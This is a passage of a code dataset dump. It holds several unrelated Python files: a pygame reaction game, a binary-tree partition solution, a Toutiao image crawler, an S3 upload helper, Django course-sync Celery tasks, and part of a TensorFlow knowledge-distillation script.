pygame.Rect((self.x, self.y), (self.disc_radius_size * 2, self.disc_radius_size * 2))\n self.true_disc_speed = 50\n self.disc_speed = int(self.true_disc_speed * scaler)\n self.switch = 0\n self.rest = 24\n self.score = 0\n self.pulse_speed = 10\n self.start_mark_close = 0\n self.start_timer = True\n\n def launch(self):\n\n success_shot = False\n last_direction = 0\n\n if self.rest:\n self.rest -= 1\n\n else:\n\n pressed_key = pygame.key.get_pressed() # creates tuple of all keys (0) and detects key pressed (1)\n\n if self.switch == 0:\n if pressed_key[pygame.K_UP]:\n\n if doors.start_mark_open:\n if self.start_timer:\n self.start_mark_close = pygame.time.get_ticks() - doors.start_mark_open\n self.start_timer = False\n self.switch = 1\n\n elif pressed_key[pygame.K_DOWN]:\n\n if doors.start_mark_open:\n if self.start_timer:\n self.start_mark_close = pygame.time.get_ticks() - doors.start_mark_open\n self.start_timer = False\n self.switch = 2\n\n elif pressed_key[pygame.K_LEFT]:\n\n if doors.start_mark_open:\n if self.start_timer:\n self.start_mark_close = pygame.time.get_ticks() - doors.start_mark_open\n self.start_timer = False\n self.switch = 3\n\n elif pressed_key[pygame.K_RIGHT]:\n\n if doors.start_mark_open:\n if self.start_timer:\n 
self.start_mark_close = pygame.time.get_ticks() - doors.start_mark_open\n self.start_timer = False\n self.switch = 4\n\n if self.switch == 1:\n self.disc.y -= self.disc_speed\n elif self.switch == 2:\n self.disc.y += self.disc_speed\n elif self.switch == 3:\n self.disc.x -= self.disc_speed\n elif self.switch == 4:\n self.disc.x += self.disc_speed\n\n if any([self.disc.top > surface_height,\n self.disc.bottom < 0,\n self.disc.left > surface_width,\n self.disc.right < 0]):\n success_shot = True\n self.score += 1\n # self.disc.x, self.disc.y = self.x, self.y\n last_direction = self.switch\n self.switch = 0\n self.rest = 24\n self.start_timer = True\n\n return success_shot, max(self.switch, last_direction), self.disc.center\n\n def collision(self, bx, by, dx, dy):\n distance = (((dx - bx) ** 2) + ((dy - by) ** 2)) ** .5\n\n if distance <= self.disc_radius_size:\n return True, (dx, dy)\n else:\n return False, (dx, dy)\n\n def ball_pulse(self, switch_state, current_color):\n if not lives:\n return False, 0\n\n if current_color >= 245:\n switch_state = False\n elif current_color <= 100:\n switch_state = True\n\n if lives == 10:\n self.pulse_speed = 1\n else:\n self.pulse_speed = int(25 // lives)\n if current_color + self.pulse_speed > 255:\n current_color = 255 - self.pulse_speed\n\n if not switch_state:\n return switch_state, current_color - self.pulse_speed\n elif switch_state:\n return switch_state, current_color + self.pulse_speed\n\n def draw_disc(self, current_color):\n\n blue_shift = current_color\n red_shift = 255 + (current_color * -1) + self.pulse_speed\n\n if red_shift > 200:\n red_shift = 200\n if blue_shift > 255:\n blue_shift = 255\n\n pygame.draw.circle(\n surface,\n (red_shift, 0, blue_shift),\n (self.disc.x + self.disc_radius_size, self.disc.y + self.disc_radius_size),\n self.disc_radius_size,\n int(35 * scaler))\n\n return red_shift, 0, blue_shift\n\n @staticmethod\n def get_ball_color(current):\n return current\n\n def shadow(self, shadow_color):\n\n diff_r = shadow_color[0] - color.background[0]\n diff_g = shadow_color[1] - color.background[1]\n diff_b = shadow_color[2] - color.background[2]\n divisor = len(all_shadows)\n incrementor = [abs(diff_r / divisor), abs(diff_g / divisor), abs(diff_b / divisor)]\n\n r, g, b = shadow_color[0], shadow_color[1], shadow_color[2]\n all_colors = []\n for _ in range(len(all_shadows)):\n if diff_r < 0:\n r += (incrementor[0])\n else:\n r -= (incrementor[0])\n\n if diff_g < 0:\n g += (incrementor[1])\n else:\n g -= (incrementor[1])\n\n if diff_b < 0:\n b += (incrementor[2])\n else:\n b -= (incrementor[2])\n\n output_color = (int(r), int(g), int(b))\n all_colors.append(output_color)\n\n if not landing:\n for idx, shadow in enumerate(all_shadows):\n shadow.append((self.disc.x, self.disc.y))\n pygame.draw.circle(\n surface,\n all_colors[(len(all_shadows) - 1) - idx],\n (shadow[0][0] + self.disc_radius_size, shadow[0][-1] + self.disc_radius_size),\n self.disc_radius_size,\n int((idx + 1) ** 1.3))\n\n def disc_landing(self, distance):\n\n # for idx, shadow in enumerate(all_shadows):\n # shadow.append((self.disc.x, self.disc.y))\n for idx in range(len(all_shadows)-1, -1, -1):\n all_shadows[idx].append((self.disc.x, self.disc.y))\n\n pygame.draw.circle(surface, current_disc_color,\n (self.disc.x + self.disc_radius_size, self.disc.y + self.disc_radius_size),\n self.disc_radius_size + distance,\n int((35 * scaler) + distance // 4))\n\n\n def draw_margin(m_color, rehab):\n # red = (240, 17, 59)\n # blue = (59, 17, 240)\n # purple = (82, 0, 106)\n r, g, 
b = m_color[0], m_color[1], m_color[2]\n if rehab < margin_return_nominal_state_duration:\n\n fail_nominal_shift = \\\n (abs(color.fail_color[0] - color.margin_color[0]) / margin_return_nominal_state_duration,\n abs(color.fail_color[1] - color.margin_color[1]) / margin_return_nominal_state_duration,\n abs(color.fail_color[2] - color.margin_color[2]) / margin_return_nominal_state_duration)\n success_nominal_shift = \\\n (abs(color.success_color[0] - color.margin_color[0]) / margin_return_nominal_state_duration,\n abs(color.success_color[1] - color.margin_color[1]) / margin_return_nominal_state_duration,\n abs(color.success_color[2] - color.margin_color[2]) / margin_return_nominal_state_duration)\n\n shift = (0, 0, 0)\n if m_color == color.fail_color:\n shift = fail_nominal_shift\n elif m_color == color.success_color:\n shift = success_nominal_shift\n\n if m_color[0] > color.margin_color[0]:\n r = m_color[0] - shift[0] * rehab\n else:\n r = m_color[0] + shift[0] * rehab\n\n if m_color[1] > color.margin_color[1]:\n g = m_color[1] - shift[1] * rehab\n else:\n g = m_color[1] + shift[1] * rehab\n\n if m_color[2] > color.margin_color[2]:\n b = m_color[2] - shift[2] * rehab\n else:\n b = m_color[2] + shift[2] * rehab\n\n m_color = int(r), int(g), int(b)\n\n return pygame.draw.rect(surface, m_color, (0, 0, surface_width, surface_height), margin)\n\n # text rendered using blit\n def stats(total_points, lives_left, time_left):\n font_style = \"darkforest.ttf\"\n lives_style = \"SF Square Head Bold.ttf\"\n font = pygame.font.Font(f\"{font_style}\", int(20 * scaler))\n lives_font = pygame.font.Font(f\"{lives_style}\", int(75 * scaler))\n\n text_color = color.doors_color\n timer_color = color.doors_color\n lives_color = color.doors_color\n if time_left <= 10:\n timer_color = color.fail_color\n\n if lives_left <= 3:\n lives_color = color.fail_color\n\n shot_accuracy = total_points[0]\n total_openings = total_points[-1]\n\n text_surface = font.render(f\"shots made/total: {shot_accuracy}\", True, text_color)\n text_surface1 = lives_font.render(str(lives_left), True, lives_color)\n text_surface2 = font.render(str(time_left), True, timer_color)\n text_surface3 = font.render(f\"tries/openings: {total_openings}\", True, text_color)\n\n text_rect = text_surface.get_rect()\n text_rect1 = text_surface1.get_rect()\n text_rect2 = text_surface2.get_rect()\n text_rect3 = text_surface3.get_rect()\n\n text_rect.centerx, text_rect.centery = surface_width // 2, surface_height // 2 + (130 * scaler)\n text_rect1.centerx, text_rect1.centery = surface_width // 2, surface_height // 2\n text_rect2.centerx, text_rect2.centery = surface_width // 2, surface_height // 2 + (40 * scaler)\n text_rect3.centerx, text_rect3.centery = surface_width // 2, surface_height // 2 - (130 * scaler)\n\n surface.blit(text_surface, text_rect)\n surface.blit(text_surface1, text_rect1)\n\n if time_remaining >= 0:\n surface.blit(text_surface2, text_rect2)\n\n surface.blit(text_surface3, text_rect3)\n\n def accuracy(pass_throughs, fails, door_slides):\n total_tries = pass_throughs + fails\n\n if not total_tries:\n percentage_1 = 0.0\n else:\n percentage_1 = round((pass_throughs / total_tries) * 100, 1)\n\n if not door_slides:\n percentage_2 = 0.0\n else:\n percentage_2 = round((total_tries / door_slides) * 100, 1)\n # print(pass_throughs, fails, total_tries, door_slides)\n return f\"{pass_throughs}/{total_tries} {percentage_1}\", f\"{total_tries}/{door_slides} {percentage_2}\"\n\n def build_reaction_data(total, success_fail, reaction_time, 
disc_direction, door):\n\n total.setdefault(\"door_speed\", doors.true_door_speed)\n total.setdefault(\"disc_speed\", disc.true_disc_speed)\n total.setdefault(\"disc_size\", disc.true_disc_radius_size)\n total.setdefault(\"success\", [])\n total.setdefault(\"fail\", [])\n total.setdefault(\"last_shot_made\", success_fail)\n\n y_axis_movement = 0\n starting_color_success = color.success_color\n starting_color_fail = color.fail_color\n current_timer = round(time_remaining_decimal, 2) # pulled from timer function\n\n if success_fail:\n total[\"success\"].append([disc_direction,\n door,\n reaction_time,\n y_axis_movement,\n starting_color_success,\n round(time_limit - current_timer, 2)])\n total[\"last_shot_made\"] = True\n else:\n total[\"fail\"].append([disc_direction,\n door, reaction_time,\n y_axis_movement,\n starting_color_fail,\n round(time_limit - current_timer, 2)])\n total[\"last_shot_made\"] = False\n\n return total\n\n def reaction_text(reaction_data):\n\n door_speed_data = reaction_data['door_speed']\n disc_speed_data = reaction_data['disc_speed']\n disc_size_data = reaction_data['disc_size']\n success_data = reaction_data['success']\n fail_data = reaction_data['fail']\n shot_made = reaction_data['last_shot_made']\n\n if shot_made:\n y_adjustment = int(success_data[-1][-3])\n current_color = list(success_data[-1][-2])\n\n diff = [abs(color.background[0] - color.success_color[0]),\n abs(color.background[1] - color.success_color[1]),\n abs(color.background[2] - color.success_color[2])]\n\n smallest = min(diff)\n\n increments = ((diff[0] / smallest),\n (diff[1] / smallest),\n (diff[2] / smallest))\n else:\n y_adjustment = int(fail_data[-1][-3])\n current_color = list(fail_data[-1][-2])\n\n diff = [abs(color.background[0] - color.fail_color[0]),\n abs(color.background[1] - color.fail_color[1]),\n abs(color.background[2] - color.fail_color[2])]\n\n smallest = min(diff)\n\n increments = ((diff[0] / smallest),\n (diff[1] / smallest),\n (diff[2] / smallest))\n\n if color.background[0] - current_color[0] < 0:\n current_color[0] -= increments[0] * react_fade_speed\n else:\n current_color[0] += increments[0] * react_fade_speed\n if color.background[1] - current_color[1] < 0:\n current_color[1] -= increments[1] * react_fade_speed\n else:\n current_color[1] += increments[1] * react_fade_speed\n if color.background[2] - current_color[2] < 0:\n current_color[2] -= increments[2] * react_fade_speed\n else:\n current_color[2] += increments[2] * react_fade_speed\n\n current_color = (int(current_color[0]), int(current_color[1]), int(current_color[2]))\n\n font_style = \"darkforest.ttf\"\n if success_data:\n success_font_size = 60 - (success_data[-1][2] // 10)\n if success_font_size < 20:\n success_font_size = 20\n else:\n success_font_size = 20\n\n success_font = pygame.font.Font(f\"{font_style}\", int(success_font_size * scaler))\n fail_font = pygame.font.Font(f\"{font_style}\", int(20 * scaler))\n\n directions = [(surface_width // 2, surface_height // 4 + y_adjustment),\n (surface_width // 2, surface_height - (surface_height // 6) + y_adjustment),\n (surface_width // 4, surface_height // 2 + y_adjustment),\n (surface_width - (surface_width // 4), surface_height // 2 + y_adjustment)]\n\n if not shot_made:\n text_surface = fail_font.render(f\"{fail_data[-1][2]}ms\", True, current_color)\n text_rect = text_surface.get_rect()\n\n text_rect.center = directions[fail_data[-1][1] - 1]\n if current_color != color.background:\n surface.blit(text_surface, text_rect)\n reaction_data[\"fail\"][-1][-2] = 
current_color\n if y_adjustment >= -100:\n reaction_data[\"fail\"][-1][3] -= react_movement_speed\n\n else:\n text_surface = success_font.render(f\"{success_data[-1][2]}ms\", True, current_color)\n text_rect = text_surface.get_rect()\n\n text_rect.center = directions[success_data[-1][0] - 1]\n if current_color != color.background:\n surface.blit(text_surface, text_rect)\n reaction_data[\"success\"][-1][-2] = current_color\n if y_adjustment >= -50:\n reaction_data[\"success\"][-1][3] -= react_movement_speed\n\n return reaction_data\n\n def explosion(coords, particles):\n explode_x = coords[0]\n explode_y = coords[-1]\n shrapnel_exists = True\n shrapnel_speed_x = list(range(-50, 50))\n shrapnel_speed_y = list(range(-50, 50))\n\n for i in range(200):\n explode_speed_x = random.choice(shrapnel_speed_x)\n explode_speed_y = random.choice(shrapnel_speed_y)\n shrapnel_size = random.randint(5, 20)\n\n particles.append([\n [explode_x, explode_y],\n [explode_speed_x, explode_speed_y],\n shrapnel_size,\n shrapnel_exists\n ])\n\n return particles\n\n def anim_explosion(particles, shrapnel_color):\n # index explanation\n # [0][0] [0][1] [explode_x, explode_y],\n # [1][0] [1][1] [explode_speed_x, explode_speed_y],\n # [2] 2 shrapnel_size,\n # [3] 3 shrapnel_exists\n\n for current_particle in particles:\n current_particle[0][0] += current_particle[1][0]\n current_particle[0][1] += current_particle[1][1]\n current_particle[2] -= random.choice([.1, .3, .5, .7, 1])\n current_particle[1][1] += 2\n\n pygame.draw.rect(surface, shrapnel_color,\n (int(current_particle[0][0]),\n int(current_particle[0][1]),\n int(current_particle[2]),\n int(current_particle[2])))\n\n if current_particle[2] <= 0:\n current_particle[3] = False\n\n for current_particle in all_particles:\n if not current_particle[3]:\n all_particles.remove(current_particle)\n return particles\n\n def timer(elapsed_seconds):\n return time_limit - elapsed_seconds\n\n doors = Doors()\n disc = Disc()\n\n while True:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n quit()\n\n elif event.type == pygame.KEYDOWN:\n if pygame.key.name(event.key) == \"q\":\n game_over = True\n\n clock.tick(fps)\n surface.fill(color.background)\n\n disc_scored, disc_direction, disc_coord = disc.launch()\n # if disc_scored:\n # disc.disc.x, disc.disc.y = disc.x, disc.y\n # landing = True\n\n\n time_remaining_decimal = round(timer((pygame.time.get_ticks() - timer_marker) / 1000), 2) # precise timer\n time_remaining = int(time_remaining_decimal) # main game timer\n all_particles = anim_explosion(all_particles, disc_explosion_color)\n disc_color_rising, disc_color = disc.ball_pulse(disc_color_rising, disc_color)\n disc.shadow(current_disc_color)\n doors.draw_doors()\n draw_margin(margin_color, margin_return_nominal_state)\n\n # *note: doors.slide_N returns the following: door_N_x, door_N_y, door_N_y_front_side\n # [ball_direction - 1]: 0 - un-launched, 1 - top, 2 - bottom, 3 - left, 4 - right\n chosen_door_coords = [doors.slide_T(),\n doors.slide_B(),\n doors.slide_L(),\n doors.slide_R()][disc_direction - 1]\n\n if landing:\n disc.disc_landing(disc_distance)\n disc_distance -= 48\n if disc_distance < 0:\n disc_distance = 576\n landing = False\n\n if not game_over:\n\n if disc_scored:\n margin_color = color.success_color\n margin_return_nominal_state = 1\n score = disc.score\n react_success = True\n # print(f\"1: {ball.start_mark_close, ball_direction} current/last active door: {doors.last_open}\")\n if disc.start_mark_close > 0:\n current_react_data = 
build_reaction_data(\n current_react_data,\n react_success,\n disc.start_mark_close,\n disc_direction,\n doors.last_open)\n\n disc.disc.x, disc.disc.y = disc.x, disc.y\n landing = True\n\n else:\n # created to change index when searching chosen_door_coords for either front side or back side\n if (disc_direction - 1) < 2:\n x, y = 0, -1\n else:\n x, y = -1, 1\n\n collision_result_front, collide_location = disc.collision(\n disc_coord[0],\n disc_coord[-1],\n chosen_door_coords[x],\n chosen_door_coords[y])\n\n if not collision_result_front:\n collision_result_back, collide_location = disc.collision(\n disc_coord[0],\n disc_coord[-1],\n chosen_door_coords[0],\n chosen_door_coords[1])\n\n if any([collision_result_front, collision_result_back]):\n\n react_success = False\n # print(f\"0: {ball.start_mark_close, ball_direction} current/last active door: {doors.last_open}\")\n if disc.start_mark_close > 0:\n current_react_data = build_reaction_data(\n current_react_data,\n react_success,\n disc.start_mark_close,\n disc_direction,\n doors.last_open)\n\n lives -= 1\n collisions += 1\n margin_color = color.fail_color\n all_particles = explosion(collide_location, all_particles)\n disc_explosion_color = disc.get_ball_color(current_disc_color)\n\n if lives == 0:\n margin_return_nominal_state = 0\n doors.locked = True\n game_over = True\n\n else:\n margin_return_nominal_state = 0\n disc = Disc()\n disc.rest = 10\n disc.score = score\n\n if time_remaining_decimal < 0:\n margin_return_nominal_state = 0\n doors.locked = True\n game_over = True\n\n if any([margin_color == color.fail_color, margin_color == color.success_color]):\n margin_return_nominal_state += 1\n if margin_return_nominal_state == margin_return_nominal_state_duration:\n margin_color = color.margin_color\n margin_return_nominal_state = 0\n\n accuracy_result = accuracy(score, collisions, doors.get_openings())\n\n if not game_over:\n if not landing:\n current_disc_color = disc.draw_disc(disc_color)\n\n draw_margin(margin_color, margin_return_nominal_state)\n stats(accuracy_result, lives, time_remaining)\n\n else:\n if len(all_particles) <= 1:\n return game_over, accuracy_result, time_remaining, current_react_data\n\n if current_react_data:\n current_react_data = reaction_text(current_react_data)\n\n if score == score_goal:\n if all([doors.rest_T, doors.rest_B, doors.rest_L, doors.rest_R]):\n return game_over, accuracy_result, time_remaining, current_react_data\n\n pygame.display.update()\n","repo_name":"thejourneyville/reactor","sub_path":"reactor/reactor_main_game.py","file_name":"reactor_main_game.py","file_ext":"py","file_size_in_byte":36008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19070680477","text":"\"\"\"\nGiven a binary tree with n nodes, your task is to check if it's possible to partition the tree to two trees which have the equal sum of values after removing exactly one edge on the original tree.\n\nExample 1:\n\nInput:\n 5\n / \\\n 10 10\n / \\\n 2 3\n\nOutput: True\nExplanation:\n 5\n /\n 10\n\nSum: 15\n\n 10\n / \\\n 2 3\n\nSum: 15\nExample 2:\n\nInput:\n 1\n / \\\n 2 10\n / \\\n 2 20\n\nOutput: False\nExplanation: You can't split the tree into two trees with equal sum after removing exactly one edge on the tree.\nNote:\n\nThe range of tree node value is in the range of [-100000, 100000].\n1 <= n <= 10000\n\"\"\"\n\ndef checkEqualTree(root):\n if not root:\n return None\n check = collections.defaultdict(int)\n total = helper(root, check)\n if total == 0:\n return 
check[0] > 1\n return total % 2 == 0 and total / 2 in check\n\ndef helper(root, check):\n s = root.val\n if root.left:\n s += helper(root.left, check)\n if root.right:\n s += helper(root.right, check)\n check[s] += 1\n return s\n","repo_name":"ntupenn/exercises","sub_path":"medium/663.py","file_name":"663.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38700915093","text":"'''\nToutiao jiepai (street snap) image crawler\n'''\nimport requests\nfrom urllib.parse import urlencode\nfrom requests.exceptions import RequestException\nimport json\nfrom bs4 import BeautifulSoup\nimport re\nfrom selenium import webdriver\nfrom ajax_example_config import *\nimport pymongo\nimport os\nfrom hashlib import md5\nfrom multiprocessing import Pool\nimport datetime\n\nclient= pymongo.MongoClient(MONGO_URL)\ndb=client[MONGO_DB]\n\ndef get_page_index(offset,keywords):\n data={\n 'offset':offset,\n 'format':'json',\n 'keyword':keywords,\n 'autoload':'true',\n 'count':10,\n 'cur_tab':1,\n 'from':'search_tab'\n }\n try:\n url=\"https://www.toutiao.com/search_content/?\"+urlencode(data);\n headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64)'}\n response=requests.get(url,headers=headers)\n if response.status_code==200:\n return response.text\n return None\n except RequestException:\n print('error requesting index page')\n return None\n\ndef parse_page_index(html):\n data=json.loads(html)\n if data and 'data' in data.keys():\n for item in data.get('data'):\n yield item.get('article_url')\n\n\ndef get_page_detail(url):\n try:\n browser = webdriver.PhantomJS()\n browser.get(url)\n return browser.page_source\n except RequestException:\n print('error requesting detail page')\n return None\n\ndef parse_page_detail(url,html):\n soup=BeautifulSoup(html,'lxml')\n title=soup.select('title')[0].get_text()\n images_pattern=re.compile('\"url.*?:(.*?),',re.S)\n result=re.findall(images_pattern,html)\n tu_result=[];\n # print(result)\n date=datetime.datetime.now().strftime('%Y%m%d%H%M%S')\n for index in range(len(result)):\n if index%4==0:\n l=len(result[index])-2\n s=result[index][2:l]\n content=down_load(s.replace(\"\\\\\\/\",\"/\"))\n if content is not None:\n path=save_img(date,content)\n tu_result.append(path);\n return {\n 'title':title,\n 'url':url,\n 'result':tu_result\n }\n\ndef save_to_mongo(result):\n if db[MONGO_TABLE].insert(result):\n print('saved to mongo successfully')\n return True\n return False\n\n\ndef down_load(url):\n print('downloading: '+url)\n try:\n response=requests.get(url)\n if response.status_code==200:\n return response.content\n return None\n except RequestException:\n print('request failed')\n return None\ndef save_img(index,content):\n print('saving image')\n print(index)\n path='{0}/{1}'.format(os.getcwd()+\"/download_pic\",index)\n if not os.path.exists(path):\n os.makedirs(path)\n new = content.strip() # or new.split()[index]\n hs = md5(str(new).encode()).hexdigest()\n file_path='{0}/{1}.{2}'.format(path,hs ,'jpg')\n if not os.path.exists(file_path):\n with open(file_path,'wb') as f:\n f.write(content)\n f.close()\n return file_path\ndef main(offset):\n html= get_page_index(offset,KEYWORDS)\n for url in parse_page_index(html):\n if url is not None:\n html=get_page_detail(url)\n result=parse_page_detail(url,html)\n if result:save_to_mongo(result)\n\nif __name__==\"__main__\":\n groups=[x*20 for x in range(GROUP_START,GROUP_END+1)]\n pool = Pool()\n 
pool.map(main,groups)\n","repo_name":"niuyacong/python_spider","sub_path":"example/ajax_example.py","file_name":"ajax_example.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9026607841","text":"import math\n\nimport os\nfrom bawt import log as logging\nfrom bawt.bawt import Bawt\nfrom boto.s3.connection import S3Connection\nfrom boto.s3.key import Key\nfrom filechunkio import FileChunkIO\n\nLOG = logging.get_logger(__name__)\n\n\nclass S3(Bawt):\n\n def __init__(self):\n super(self.__class__, self).__init__()\n self._aws_access_key = self.aws.get('access_key', None)\n self._aws_secret_key = self.aws.get('secret_key', None)\n\n def connect(self):\n conn = None\n if not self._aws_access_key or not self._aws_secret_key:\n raise Exception('AWS Credentials are not set')\n\n try:\n conn = S3Connection(self._aws_access_key, self._aws_secret_key)\n LOG.debug(\"Successfully connected to S3\")\n\n except Exception as e:\n LOG.critical(str(e))\n return conn\n\n def _get_destination(self, destination):\n return self.camera['destinations'].get(destination, None)\n\n def _create_or_set_bucket(self, bucket):\n conn = self.connect()\n try:\n b = conn.create_bucket(bucket)\n self._bucket = bucket\n except:\n b = conn.get_bucket(bucket)\n return b\n\n def _create_key(self, key_name, bucket):\n b = self._create_or_set_bucket(bucket)\n k = Key(b)\n k.key = key_name\n return k, b\n\n def save_file(self, bucket, file_path):\n file_size = os.stat(file_path).st_size\n file_dir, file_name = os.path.split(file_path)\n\n k, b = self._create_key(file_name, bucket)\n LOG.info(\"Starting S3 file upload. %s to %s\" % (file_path, bucket))\n mp = b.initiate_multipart_upload(file_name)\n chunk_size = 52428800\n chunk_count = int(math.ceil(file_size / float(chunk_size)))\n for i in range(chunk_count):\n offset = chunk_size * i\n _bytes = min(chunk_size, file_size - offset)\n with FileChunkIO(file_path, 'r', offset=offset, bytes=_bytes) as fp:\n mp.upload_part_from_file(fp, part_num=i + 1)\n mp.complete_upload()\n LOG.info(\"Completed S3 file upload. %s to %s\" % (file_path, bucket))\n\n def save_string(self, bucket, name, content):\n \"\"\"\n Save string to S3 bucket\n :param bucket: bucket name\n :param name: remote name for object\n :param content: Contents to save to remote object\n \"\"\"\n LOG.info(\"Starting S3 string upload. %s to %s\" % (name, bucket))\n k, b = self._create_key(name, bucket)\n k.set_contents_from_string(content)\n LOG.info(\"Completed S3 string upload. 
%s to %s\" % (name, bucket))\n","repo_name":"DoriftoShoes/bawt","sub_path":"bawt/remotes/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"4217100350","text":"\"\"\"\nTasks for the courses app\n\"\"\"\nimport logging\n\nfrom django.conf import settings\nfrom django.db.models import Q\nfrom mitol.common.utils.datetime import now_in_utc\n\nfrom courses.models import (\n CourseRun,\n CourseRunEnrollment,\n LearnerProgramRecordShare,\n PaidCourseRun,\n Program,\n)\nfrom main.celery import app\n\nlog = logging.getLogger(__name__)\n\n\n@app.task\ndef sync_courseruns_data():\n \"\"\"\n Task to sync titles and dates for course runs from edX.\n \"\"\"\n from courses.api import sync_course_mode, sync_course_runs\n\n now = now_in_utc()\n runs = CourseRun.objects.live().filter(\n Q(expiration_date__isnull=True) | Q(expiration_date__gt=now)\n )\n\n # `sync_course_runs` logs internally so no need to capture/output the returned values\n sync_course_mode(runs)\n sync_course_runs(runs)\n\n\n@app.task(acks_late=True)\ndef subscribe_edx_course_emails(enrollment_id):\n \"\"\"Task to subscribe user to edX Emails\"\"\"\n from openedx.api import subscribe_to_edx_course_emails\n\n enrollment = CourseRunEnrollment.objects.select_related(\"user\", \"run\").get(\n id=enrollment_id\n )\n\n subscribed = subscribe_to_edx_course_emails(enrollment.user, enrollment.run)\n\n if subscribed:\n enrollment.edx_emails_subscription = subscribed\n enrollment.save()\n\n\n@app.task\ndef generate_course_certificates():\n \"\"\"\n Task to generate certificates for courses.\n \"\"\"\n from courses.api import generate_course_run_certificates\n\n generate_course_run_certificates()\n\n\n@app.task\ndef send_partner_school_email(record_uuid):\n \"\"\"\n Task to send the partner school emails.\n \"\"\"\n from courses.mail_api import send_partner_school_sharing_message\n\n record = LearnerProgramRecordShare.objects.get(share_uuid=record_uuid)\n\n send_partner_school_sharing_message(record)\n\n\n@app.task\ndef clear_unenrolled_paid_course_run(enrollment_id):\n \"\"\"\n Pulls the order specified and clears any PaidCourseRun records for it. 
If\n these exist, the user won't be able to re-buy into the course later if they\n want to.\n \"\"\"\n from ecommerce.models import Order\n\n try:\n enrollment = CourseRunEnrollment.all_objects.filter(id=enrollment_id).get()\n\n PaidCourseRun.objects.filter(\n user=enrollment.user,\n course_run=enrollment.run,\n order__state=Order.STATE.FULFILLED,\n ).delete()\n except Exception as e:\n log.error(\n f\"Unable to clear paid course run records for enrollment ID {enrollment_id}: {str(e)}\"\n )\n","repo_name":"mitodl/mitxonline","sub_path":"courses/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"29163509367","text":"import sys\n\nsys.path.append(r'F:\\recoding_papers')\n\nimport argparse\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets\nfrom glob_params import MNIST_DATASET, logger\nimport os\n\nmnist = read_data_sets(train_dir=MNIST_DATASET, one_hot=True)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--temperature', '-T', type=float, default=-1,\n help='The temperature for DISTILLING.')\nparser.add_argument('--batch_size', '-B', type=int, default=1000,\n help='The batch size of taking images in.')\nparser.add_argument('--epoch_teacher', '-ET', type=int, default=500,\n help='The training epoch for teacher net.')\nparser.add_argument('--epoch_student_individual', '-ESI', type=int, default=500,\n help='The individual training epoch for student net.')\nparser.add_argument('--epoch_student_learning', '-ESL', type=int, default=200,\n help='The learning from teacher training epoch for student net.')\n\nargs = parser.parse_args()\n\nCKPT = os.path.join('.', 'teach.ckpt')\nCKPT_VALID = os.path.join('.', 'checkpoint')\n\n\ndef net(inputs, net_name: str):\n \"\"\"\n Network architecture template.\n :param inputs: Network input\n :param net_name: Network name for var_scope\n :return: Network output\n \"\"\"\n if 'teacher' in net_name:\n num_output = 50\n norm_fn = slim.batch_norm\n do_dropout = False\n elif 'student' in net_name:\n num_output = 30\n norm_fn = slim.batch_norm\n do_dropout = False\n else:\n raise Exception('Unrecognized NET.')\n\n with tf.variable_scope(name_or_scope=net_name, reuse=tf.AUTO_REUSE):\n with slim.arg_scope([slim.fully_connected],\n num_outputs=num_output, normalizer_fn=norm_fn, reuse=False):\n fc1 = slim.fully_connected(inputs=inputs, scope='fc1')\n fc2 = slim.fully_connected(inputs=fc1, scope='fc2')\n output = slim.fully_connected(inputs=fc2,\n num_outputs=10,\n scope='output',\n activation_fn=None,\n normalizer_fn=None)\n if do_dropout:\n output = slim.dropout(inputs=output, keep_prob=0.9)\n return output\n\n\ndef teacher_net(inputs):\n \"\"\"\n Build the Teacher Network.\n :param inputs: Teacher Network inputs\n :return: Teacher Network outputs\n \"\"\"\n return net(inputs=inputs, net_name='teacher')\n\n\ndef student_net(inputs):\n \"\"\"\n Build the Student Network.\n :param inputs: Student Network inputs\n :return: Student Network outputs\n \"\"\"\n return net(inputs=inputs, net_name='student')\n\n\ndef train(temperature: float,\n batch_size: int,\n epoch_teacher: int,\n epoch_student_individual: int,\n epoch_student_learning: int):\n \"\"\"\n Train Teacher and Student Network.\n :param temperature: Temperature for distilling\n :param batch_size: batch size for MNIST\n :param epoch_teacher: Training epoch of Teacher Network\n 
:param epoch_student_individual: Training epoch of Student Network\n    :param epoch_student_learning: Teaching epoch of Student Network\n    :return: Enhancement of the accuracy of Student Network\n    \"\"\"\n    tf.set_random_seed(1)\n    tf.reset_default_graph()\n\n    if os.path.exists(CKPT_VALID):\n        do_train = False\n    else:\n        do_train = True\n\n    do_learn = not do_train\n\n    X = tf.placeholder(dtype=tf.float32, shape=[None, 784], name='X')\n    Y = tf.placeholder(dtype=tf.float32, shape=[None, 10], name='Y')\n\n    output_teacher = teacher_net(X)\n    output_student = student_net(X)\n\n    loss_teacher = slim.losses.softmax_cross_entropy(logits=output_teacher, onehot_labels=Y, scope='loss_teacher')\n    loss_student = slim.losses.softmax_cross_entropy(logits=output_student, onehot_labels=Y, scope='loss_student')\n\n    loss_student_learning = temperature ** 2 * slim.losses.mean_squared_error(\n        predictions=slim.softmax(output_student / temperature),\n        labels=slim.softmax(output_teacher / temperature))\n\n    train_vars = tf.trainable_variables()\n\n    vars_teacher = [v for v in train_vars if 'teacher' in v.name]\n    vars_student = [v for v in train_vars if 'student' in v.name]\n\n    optimizer = tf.train.AdamOptimizer(learning_rate=0.01)\n    sgd_optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.01)\n\n    opt_teacher = optimizer.minimize(loss_teacher, var_list=vars_teacher)\n    opt_student = sgd_optimizer.minimize(loss_student, var_list=vars_student)\n    opt_student_learning = optimizer.minimize(loss_student_learning)\n\n    correct_prediction_teacher = tf.equal(tf.argmax(Y, 1), 